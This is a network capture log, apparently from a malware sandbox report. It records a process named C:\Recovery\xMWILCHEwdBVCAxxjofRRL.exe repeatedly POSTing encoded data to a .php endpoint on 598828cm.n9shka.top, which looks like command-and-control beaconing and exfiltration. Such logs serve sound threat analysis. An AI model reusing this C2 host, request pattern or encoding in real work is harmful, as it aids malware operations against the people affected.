Sep 14, 2024 12:53:31.321805954 CEST	1008	OUT	Data Raw: 56 54 59 5f 51 43 5a 5a 5e 5e 56 51 56 5b 54 5d 57 56 5c 54 57 5c 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY_QCZZ^^VQV[T]WV\TW\UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y<"0>V5(Z)[6_"4$?1 ?931:5]4/&F/%Z-1
Sep 14, 2024 12:53:31.636471987 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:31.768908024 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	62788	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:31.640510082 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1736 Expect: 100-continue
Sep 14, 2024 12:53:31.993634939 CEST	1736	OUT	Data Raw: 53 57 59 54 54 43 5f 58 5e 5e 56 51 56 5b 54 59 57 5e 5c 5c 57 5a 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWYTTC_X^^VQV[TYW^\\WZU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<?5Z'-:R"7?=.!!Y+';(^2+Z+7Q1\&7![.,&F/%Z-!
Sep 14, 2024 12:53:32.336026907 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:32.529690027 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 59 29 1d 30 10 37 39 3c 18 3c 3c 32 58 2a 0c 04 5c 3e 02 02 06 2a 0a 22 01 2a 13 3f 51 30 12 23 02 33 0f 00 04 27 37 2c 0b 22 01 2e 5a 0c 1d 20 00 20 0d 3a 11 25 3b 35 03 25 21 26 17 20 21 3b 5f 25 5d 21 59 21 2f 29 01 2b 38 21 1b 3e 0f 08 0d 29 3d 31 1a 2f 5b 35 0e 20 28 23 51 00 10 25 08 31 2e 13 5a 35 27 35 11 28 31 3e 00 26 36 32 57 33 15 25 03 31 06 35 5d 24 1d 30 03 20 22 2f 11 27 3c 23 1a 37 20 21 53 28 3e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #Y)079<<<2X\>"*?Q0#3'7,".Z :%;5%!& !;_%]!Y!/)+8!>)=1/[5 (#Q%1.Z5'5(1>&62W3%15]$0 "/'<#7 !S(>#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	62789	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:31.903327942 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:32.259241104 CEST	1012	OUT	Data Raw: 56 53 5c 59 51 44 5a 5b 5e 5e 56 51 56 53 54 5a 57 52 5c 5e 57 5d 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\YQDZ[^^VQVSTZWR\^W]UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<=015=2\50[3&:+_(91> U&,&F/%Z-
Sep 14, 2024 12:53:32.591936111 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:32.724231005 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	62790	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:33.008498907 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:33.353183031 CEST	1012	OUT	Data Raw: 56 52 5c 5c 54 42 5f 5f 5e 5e 56 51 56 5e 54 52 57 52 5c 5a 57 50 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VR\\TB__^^VQV^TRWR\ZWPUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<&=.R#$8[)-!?0;;%\/^<97Q'**!3\.<&F/%Z-=
Sep 14, 2024 12:53:33.676336050 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:33.804290056 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	62791	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:33.932869911 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:34.290548086 CEST	1012	OUT	Data Raw: 56 54 59 5d 54 44 5f 5b 5e 5e 56 51 56 59 54 5b 57 50 5c 5d 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY]TD_[^^VQVYT[WP\]W^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(Z6&=15 >6^6,8Y'8/%\7+_(%*"#38<&F/%Z-!
Sep 14, 2024 12:53:34.799982071 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:34.800520897 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:53:34.801136017 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	62792	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:34.940041065 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:35.290482998 CEST	1012	OUT	Data Raw: 56 52 59 5a 51 46 5a 58 5e 5e 56 51 56 5c 54 5c 57 53 5c 5f 57 5f 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRYZQFZX^^VQV\T\WS\_W_UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?,:3-!Q?=""/$3]%7^+41:=_##,&F/%Z-
Sep 14, 2024 12:53:35.605925083 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:35.740607977 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	62793	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:35.902857065 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:36.259403944 CEST	1008	OUT	Data Raw: 53 55 59 5e 54 48 5f 5c 5e 5e 56 51 56 5b 54 58 57 56 5c 5c 57 5b 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SUY^TH_\^^VQV[TXWV\\W[UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X<?%^36;>>-!<[0<%97(9,29)_ %/&F/%Z-%
Sep 14, 2024 12:53:36.586179018 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:36.720196009 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	62794	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:36.848117113 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:37.196922064 CEST	1012	OUT	Data Raw: 53 54 5c 58 54 45 5a 5a 5e 5e 56 51 56 59 54 5c 57 5e 5c 5c 57 59 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: ST\XTEZZ^^VQVYT\W^\\WYUZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+/9X0&"$>5#?;$ _&\#()3Q%:-4#!X/&F/%Z-!
Sep 14, 2024 12:53:37.512213945 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	62795	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:37.547703981 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:37.900084019 CEST	1748	OUT	Data Raw: 56 57 5c 5e 54 45 5f 5c 5e 5e 56 51 56 5f 54 5e 57 57 5c 5a 57 59 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VW\^TE_\^^VQV_T^WW\ZWYU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?/)_&.=!'=..Z"Y(082+[<:/2=! *;,&F/%Z-9
Sep 14, 2024 12:53:38.221062899 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:38.350033045 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 5e 29 1a 2c 13 23 14 0d 0a 3f 2f 04 58 2a 1c 21 04 29 2c 0a 03 29 24 3d 5c 2a 13 33 51 26 3f 30 16 26 31 22 06 27 19 2f 57 36 2b 2e 5a 0c 1d 23 5b 20 33 3a 10 31 28 26 59 24 08 36 5f 34 31 3b 5f 26 38 3d 5a 22 2f 2a 12 28 06 22 0b 2a 1f 2a 0f 29 04 2e 42 2f 2d 3a 52 20 02 23 51 00 10 26 1a 32 58 21 59 36 37 26 0c 29 31 3d 5a 25 0b 3d 0e 33 5d 36 1f 26 06 22 07 27 0a 2f 58 36 0b 2f 5c 27 3c 20 05 23 20 3d 57 2b 2e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #^),#?/X!),)$=\3Q&?0&1"'/W6+.Z#[ 3:1(&Y$6_41;_&8=Z"/("*).B/-:R #Q&2X!Y67&)1=Z%=3]6&"'/X6/\'< # =W+.#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	62796	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:37.673418999 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:38.024888992 CEST	1012	OUT	Data Raw: 56 52 5c 5e 54 44 5f 58 5e 5e 56 51 56 5d 54 5a 57 50 5c 54 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VR\^TD_X^^VQV]TZWP\TWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,$.&#7[1"'(41\,+2X43!8&F/%Z-1
Sep 14, 2024 12:53:38.356945038 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:38.547240973 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	62797	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:38.696543932 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:39.040514946 CEST	1012	OUT	Data Raw: 56 55 59 59 54 46 5f 59 5e 5e 56 51 56 58 54 52 57 57 5c 59 57 50 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VUYYTF_Y^^VQVXTRWW\YWPUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<=$.=!=65<#'; _':7^()&\70*;<&F/%Z-%
Sep 14, 2024 12:53:39.389436960 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:39.529771090 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	62798	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:39.660656929 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:40.009265900 CEST	1012	OUT	Data Raw: 53 50 5c 5c 54 40 5a 58 5e 5e 56 51 56 5c 54 5f 57 53 5c 59 57 5c 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SP\\T@ZX^^VQV\T_WS\YW\U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(<[&-2"7#>*\5<8X382_+:/Q1:"406,&F/%Z-
Sep 14, 2024 12:53:40.335196972 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:40.465967894 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	62799	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:40.591701984 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:40.946825027 CEST	1012	OUT	Data Raw: 56 53 59 5a 54 41 5f 5f 5e 5e 56 51 56 53 54 5f 57 53 5c 5a 57 5b 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYZTA__^^VQVST_WS\ZW[U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+<'.57#>]"?8\3%\4??%=]4 /&F/%Z-
Sep 14, 2024 12:53:41.275418997 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:41.478303909 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	62800	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:41.606794119 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:41.962397099 CEST	1012	OUT	Data Raw: 53 57 5c 5f 54 42 5f 5c 5e 5e 56 51 56 5e 54 5b 57 55 5c 5a 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SW\_TB_\^^VQV^T[WU\ZWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+Y0-54$Y>5?08\23+:+V%>#/,&F/%Z-=
Sep 14, 2024 12:53:42.278722048 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:42.409252882 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	62801	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:42.592494011 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:42.946770906 CEST	1012	OUT	Data Raw: 56 53 5c 58 51 46 5a 5c 5e 5e 56 51 56 52 54 5b 57 55 5c 58 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\XQFZ\^^VQVRT[WU\XWYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,5^&.67(=.2"Y;3 X%'_?)3')=^#:;,&F/%Z-
Sep 14, 2024 12:53:43.258702040 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	62802	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
